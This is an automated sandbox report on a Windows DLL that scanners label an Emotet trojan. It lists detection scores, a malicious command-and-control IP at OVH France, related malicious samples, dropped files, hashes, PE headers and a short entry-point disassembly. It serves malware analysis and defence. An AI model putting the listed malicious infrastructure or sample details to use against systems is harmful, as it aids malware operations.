                        5CUFfVMSaQ.dll46%MetadefenderBrowse
                        5CUFfVMSaQ.dll81%ReversingLabsWin64.Trojan.Emotet
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                        http://crl.ver)0%Avira URL Cloudsafe
                        https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                        https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                        https://188.165.79.151/0%URL Reputationsafe
                        https://188.165.79.151/oA~0%Avira URL Cloudsafe
                        http://help.disneyplus.com.0%URL Reputationsafe
                        https://www.pango.co/privacy0%URL Reputationsafe
                        https://disneyplus.com/legal.0%URL Reputationsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        https://188.165.79.151/true
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.ver)svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.647804814.0000024E7158E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646539654.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646486184.0000024E71A18000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://188.165.79.151/oA~regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://help.disneyplus.com.svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.hotspotshield.com/svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.hotspotshield.com/terms/svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.pango.co/privacysvchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://disneyplus.com/legal.svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            121.247.2.0
                            unknownIndia
                            17908TCISLTataCommunicationsINtrue
                            188.165.79.151
                            unknownFrance
                            16276OVHFRtrue
                            120.247.2.0
                            unknownChina
                            56048CMNET-BEIJING-APChinaMobileCommunicaitonsCorporationCNtrue
                            4.4.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            8.4.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            232.3.0.0
                            unknownReserved
                            unknownunknowntrue
                            139.247.2.0
                            unknownUnited States
                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                            133.247.2.0
                            unknownJapan131918SCN-NETSHONANCABLENETWORKJPtrue
                            224.146.244.0
                            unknownReserved
                            unknownunknowntrue
                            160.156.244.0
                            unknownTunisia
                            37492ORANGE-TNtrue
                            108.194.0.0
                            unknownUnited States
                            7018ATT-INTERNET4UStrue
                            160.153.244.0
                            unknownUnited States
                            21501GODADDY-AMSDEtrue
                            145.247.2.0
                            unknownFinland
                            41701CAP-FIN-ASFItrue
                            40.4.0.0
                            unknownUnited States
                            4249LILLY-ASUStrue
                            20.4.0.0
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                            143.247.2.0
                            unknownUnited States
                            600OARNET-ASUStrue
                            160.154.244.0
                            unknownCote D'ivoire
                            29571ORANGE-COTE-IVOIRECItrue
                            141.247.2.0
                            unknownUnited States
                            40112OPPD-ASUStrue
                            36.4.0.0
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                            4.1.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            160.147.244.0
                            unknownUnited States
                            1503DNIC-AS-01503UStrue
                            224.150.244.0
                            unknownReserved
                            unknownunknowntrue
                            236.3.0.0
                            unknownReserved
                            unknownunknowntrue
                            24.4.0.0
                            unknownUnited States
                            7922COMCAST-7922UStrue
                            21.115.0.0
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                            153.247.2.0
                            unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                            IP
                            127.0.0.1
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:671666
                            Start date and time: 22/07/202213:14:592022-07-22 13:14:59 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:5CUFfVMSaQ (renamed file extension from none to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.evad.winDLL@20/5@0/27
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 88.8% (good quality ratio 83.1%)
                            • Quality average: 75.3%
                            • Quality standard deviation: 30.7%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 20
                            • Number of non-executed functions: 307
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.223.24.244
                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            13:16:54API Interceptor11x Sleep call for process: svchost.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            188.165.79.151Bericht 6581.xlsGet hashmaliciousBrowse
                              nz032vqLOi.dllGet hashmaliciousBrowse
                                azKC4bycQq.dllGet hashmaliciousBrowse
                                  bLJR1tSMfo.dllGet hashmaliciousBrowse
                                    HUrHMu39FU.dllGet hashmaliciousBrowse
                                      HUrHMu39FU.dllGet hashmaliciousBrowse
                                        5Fa665mRHe.dllGet hashmaliciousBrowse
                                          5Fa665mRHe.dllGet hashmaliciousBrowse
                                            8QfaZFMbEb.dllGet hashmaliciousBrowse
                                              P22l0y2mfd.dllGet hashmaliciousBrowse
                                                ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                  xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                    bOc8U9QEOx.dllGet hashmaliciousBrowse
                                                      8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                        P22l0y2mfd.dllGet hashmaliciousBrowse
                                                          ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                            xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                              td722u34As.dllGet hashmaliciousBrowse
                                                                2vMjDd8z34.dllGet hashmaliciousBrowse
                                                                  R78g1mgKDg.dllGet hashmaliciousBrowse
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    OVHFRFactura pendiente.exeGet hashmaliciousBrowse
                                                                    • 37.59.226.102
                                                                    Demanda Judicial.exeGet hashmaliciousBrowse
                                                                    • 37.59.226.102
                                                                    QXl6ByOnZ0Get hashmaliciousBrowse
                                                                    • 213.32.50.236
                                                                    U3qoYxBsNEGet hashmaliciousBrowse
                                                                    • 51.254.200.173
                                                                    home.mpslGet hashmaliciousBrowse
                                                                    • 46.105.5.173
                                                                    http://search.becovi.comGet hashmaliciousBrowse
                                                                    • 51.178.76.105
                                                                    TheOpen_140722.cps.exeGet hashmaliciousBrowse
                                                                    • 51.195.166.175
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.21175.exeGet hashmaliciousBrowse
                                                                    • 54.38.122.217
                                                                    how_to_report_gain_on_sale_of_partnership_interest (tpydj).jsGet hashmaliciousBrowse
                                                                    • 188.165.135.193
                                                                    https://www.goodnewsnetwork.org/renaissance-masterpiece-london-bedroom-dawsons/Get hashmaliciousBrowse
                                                                    • 46.105.202.126
                                                                    nurse_practitioner_collaborative_agreement_template_missouri (eau).jsGet hashmaliciousBrowse
                                                                    • 188.165.135.193
                                                                    how_to_get_rent_agreement_notarized (ws).jsGet hashmaliciousBrowse
                                                                    • 188.165.135.193
                                                                    AWB# 6174229350.exeGet hashmaliciousBrowse
                                                                    • 37.59.226.102
                                                                    Original Invoice_12_1421-07-2022085 Document.exeGet hashmaliciousBrowse
                                                                    • 51.77.23.24
                                                                    yakuza.x86Get hashmaliciousBrowse
                                                                    • 51.71.157.145
                                                                    Confirmaci#U00f3n de Cita solicitada.exeGet hashmaliciousBrowse
                                                                    • 37.59.226.102
                                                                    AEAT Notificaci#U00f3n.exeGet hashmaliciousBrowse
                                                                    • 37.59.226.102
                                                                    https://maxima989.mx/can'ttttttt/quad/Get hashmaliciousBrowse
                                                                    • 144.217.78.79
                                                                    r2gAjMU8hM.dllGet hashmaliciousBrowse
                                                                    • 151.80.170.166
                                                                    D76jtXpDGy.dllGet hashmaliciousBrowse
                                                                    • 51.222.150.147
                                                                    TCISLTataCommunicationsINZ5aCnP2H7Z.dllGet hashmaliciousBrowse
                                                                    • 121.247.116.217
                                                                    cRwLLF9kuG.dllGet hashmaliciousBrowse
                                                                    • 115.108.216.62
                                                                    Q3jtJZWTVM.dllGet hashmaliciousBrowse
                                                                    • 219.65.253.165
                                                                    oNZ2MfY6dx.dllGet hashmaliciousBrowse
                                                                    • 121.245.219.83
                                                                    EzgoohznoZ.dllGet hashmaliciousBrowse
                                                                    • 219.65.212.230
                                                                    t4wCexrzVN.dllGet hashmaliciousBrowse
                                                                    • 59.164.2.87
                                                                    pbuthm0byt.dllGet hashmaliciousBrowse
                                                                    • 115.108.151.200
                                                                    LU2w388jzP.dllGet hashmaliciousBrowse
                                                                    • 61.17.211.5
                                                                    HMCGA8Es4i.dllGet hashmaliciousBrowse
                                                                    • 59.165.126.0
                                                                    sh4Get hashmaliciousBrowse
                                                                    • 61.17.252.69
                                                                    f6KrcRnK1bGet hashmaliciousBrowse
                                                                    • 121.243.246.207
                                                                    0eUuYIzAYeGet hashmaliciousBrowse
                                                                    • 121.243.246.210
                                                                    miori.i6Get hashmaliciousBrowse
                                                                    • 115.109.68.223
                                                                    5fjZZ75ZIiGet hashmaliciousBrowse
                                                                    • 115.109.216.183
                                                                    sora.arm7Get hashmaliciousBrowse
                                                                    • 59.165.97.15
                                                                    uKu0BBAdlYGet hashmaliciousBrowse
                                                                    • 61.11.60.50
                                                                    ngcGPe9yO1Get hashmaliciousBrowse
                                                                    • 115.108.217.140
                                                                    E1IVxyA9YjGet hashmaliciousBrowse
                                                                    • 59.165.73.78
                                                                    arm7Get hashmaliciousBrowse
                                                                    • 59.165.111.93
                                                                    NFqeiFXp7yGet hashmaliciousBrowse
                                                                    • 121.246.104.235
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    51c64c77e60f3980eea90869b68c58a87533.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    http://clotizen.dothome.co.kr/members/lZTkIb3OkjcVGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    bscHLGMyjW.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    psIFSn7VLi.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    7533.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    tfdDMwdU0d.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    7533.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    QZKYOgOZZJ.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    QZKYOgOZZJ.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    vaezZRgmJv.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    MpCmd4.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    MpCmd4.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    MpCmd4.exeGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    MpCmd4.exeGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    KzMWhHv0wj.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    5ywyY235gq.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    psegJrZqzl.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    L69zUouuZJ.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    OL378CR0nZ.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    DB9nlmI2M6.dllGet hashmaliciousBrowse
                                                                    • 188.165.79.151
                                                                    No context
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.3593198815979092
                                                                    Encrypted:false
                                                                    SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                    MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                    SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                    SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                    SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                    Malicious:false
                                                                    Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:MPEG-4 LOAS
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.24947955525151602
                                                                    Encrypted:false
                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4i:BJiRdwfu2SRU4i
                                                                    MD5:1DF93142E07F403B10A2C717C0F36ACC
                                                                    SHA1:C60DFCA92DFCF85A34BBC3680B975D9E7783BC71
                                                                    SHA-256:547F0093516E49BA5ECF3E8A6861DD5A576C68B4778318EAEF931FA7E41464A2
                                                                    SHA-512:6EF5C5E65D3E71DBAF680C15512EA9E1A0FA17D969D3C05959284E95FFDEAA87CFE3843D6FDA29B12646AB2E9C5DD675BFB81D5357C94B39ED7E2286EAC794BC
                                                                    Malicious:false
                                                                    Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x555eccf5, page size 16384, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):786432
                                                                    Entropy (8bit):0.2505532827291524
                                                                    Encrypted:false
                                                                    SSDEEP:384:zPw+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zPvSB2nSB2RSjlK/+mLesOj1J2
                                                                    MD5:B108CC58B01CE88C345B14837CD712B0
                                                                    SHA1:30AA6A7615EC2B8D56B5CA49FA5E6FEF86FAF139
                                                                    SHA-256:F7999A41C300967BE907E519A2E5EFD39443BD0ACA3FAB73576820DD412CF11B
                                                                    SHA-512:B2B89BFB7B0702D70C6F63BDAB2D989382DA1E9648D9254ED172596ACFA5002448DF170EEB7B10C06DF0E673A95F744F27AD38A083567DC83368606075311F1C
                                                                    Malicious:false
                                                                    Preview:U^..... ................e.f.3...w........................)..........zM.6....z..h.(..........zM...)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................I.....zM....................w.....zM.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07330449171033379
                                                                    Encrypted:false
                                                                    SSDEEP:3:q//J7vTXnoAl/jo+c3wjtRnZl/all3Vkttlmlnl:qXJrUnHYRy3
                                                                    MD5:B5E3E9AA630E00B392934C7C69EF4E06
                                                                    SHA1:CE4A4F072F33A764CE095DC07EA5B1EC4BA59C36
                                                                    SHA-256:48FD84925729F7BF36AFFB9EBD1DEF5889CCC44C8CC9D59E77DA798E4C4A598A
                                                                    SHA-512:26709ED8D7400C8935CF6CC5D9914431FFD607E63348248D69D1B53C7E73DC358A60A0EB510D613B8DCE4518B5E5C052F00E5A7A4F51F88DEAE6D959CFEDCDF6
                                                                    Malicious:false
                                                                    Preview:?.)......................................3...w..6....z.......zM..............zM......zM.D2.......z.m...................w.....zM.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.931234965672042
                                                                    TrID:
                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                    File name:5CUFfVMSaQ.dll
                                                                    File size:691200
                                                                    MD5:5d4728494832d03bbfb75367836fef4e
                                                                    SHA1:abcbd283801a05390995862f59dcb5310f3d3d88
                                                                    SHA256:caa60b9025dfba07efac6cae5438a8e20d9b7c210a721a4cf1f9d7b6df4d7d90
                                                                    SHA512:89f38029d8cc4718af304e325a290294a000e68fea0d036fbe118cc04bd3ae5a676cab2dbc6ea4d1c53eeac804cd23756c01dce378a317cb683200365ad5079a
                                                                    SSDEEP:12288:pBBKShhc/bQisqkxf3CJS+HQ58B6loNJYlvw9zaaxRHdAsxuvt3a1gYao3ovJK6S:bBHlvw9GanHrot3hoW
                                                                    TLSH:45E4BE56ABE404B1E1B7D235C9128E81FAB3FC544724AB8B03E095B62F233AC557F716
                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......b.........." ................d?.......................................0............ ........................................
                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                    Entrypoint:0x180003f64
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x180000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT
                                                                    Time Stamp:0x62BAE9E7 [Tue Jun 28 11:45:43 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:6cc0be0d01417a15b61c3b6a580e87ed
                                                                    Instruction
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], esi
                                                                    push edi
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec ecx
                                                                    mov edi, eax
                                                                    mov ebx, edx
                                                                    dec eax
                                                                    mov esi, ecx
                                                                    cmp edx, 01h
                                                                    jne 00007F4F7C9FE2F7h
                                                                    call 00007F4F7C9FE314h
                                                                    dec esp
                                                                    mov eax, edi
                                                                    mov edx, ebx
                                                                    dec eax
                                                                    mov ecx, esi
                                                                    dec eax
                                                                    mov ebx, dword ptr [esp+30h]
                                                                    dec eax
                                                                    mov esi, dword ptr [esp+38h]
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop edi
                                                                    jmp 00007F4F7C9FE184h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    mov dword ptr [esp+20h], ebx
                                                                    push ebp
                                                                    dec eax
                                                                    mov ebp, esp
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov eax, dword ptr [0006E0C0h]
                                                                    dec eax
                                                                    mov ebx, 2DDFA232h
                                                                    cdq
                                                                    sub eax, dword ptr [eax]
                                                                    add byte ptr [eax+3Bh], cl
                                                                    ret
                                                                    jne 00007F4F7C9FE366h
                                                                    dec eax
                                                                    and dword ptr [ebp+18h], 00000000h
                                                                    dec eax
                                                                    lea ecx, dword ptr [ebp+18h]
                                                                    call dword ptr [0006741Ah]
                                                                    dec eax
                                                                    mov eax, dword ptr [ebp+18h]
                                                                    dec eax
                                                                    mov dword ptr [ebp+10h], eax
                                                                    call dword ptr [0006738Ch]
                                                                    mov eax, eax
                                                                    dec eax
                                                                    xor dword ptr [ebp+10h], eax
                                                                    call dword ptr [00067370h]
                                                                    mov eax, eax
                                                                    dec eax
                                                                    lea ecx, dword ptr [ebp+20h]
                                                                    dec eax
                                                                    xor dword ptr [ebp+10h], eax
                                                                    call dword ptr [00067490h]
                                                                    mov eax, dword ptr [ebp+20h]
                                                                    dec eax
                                                                    lea ecx, dword ptr [ebp+10h]
                                                                    dec eax
                                                                    shl eax, 20h
                                                                    dec eax
                                                                    xor eax, dword ptr [ebp+20h]
                                                                    dec eax
                                                                    xor eax, dword ptr [ebp+10h]
                                                                    dec eax
                                                                    xor eax, ecx
                                                                    dec eax
                                                                    mov ecx, FFFFFFFFh
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x69f180xe9d.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6adb50x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x890000x28080.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x750000x4620.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000x808.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5ed800x138.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x6b1b80x3b0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5c9660x5ca00False0.4055093412618084data6.495336903226537IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x5e0000x131740x13200False0.41204554738562094data5.399737438631881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x720000x28940xe00False0.15625data2.3008281540935718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
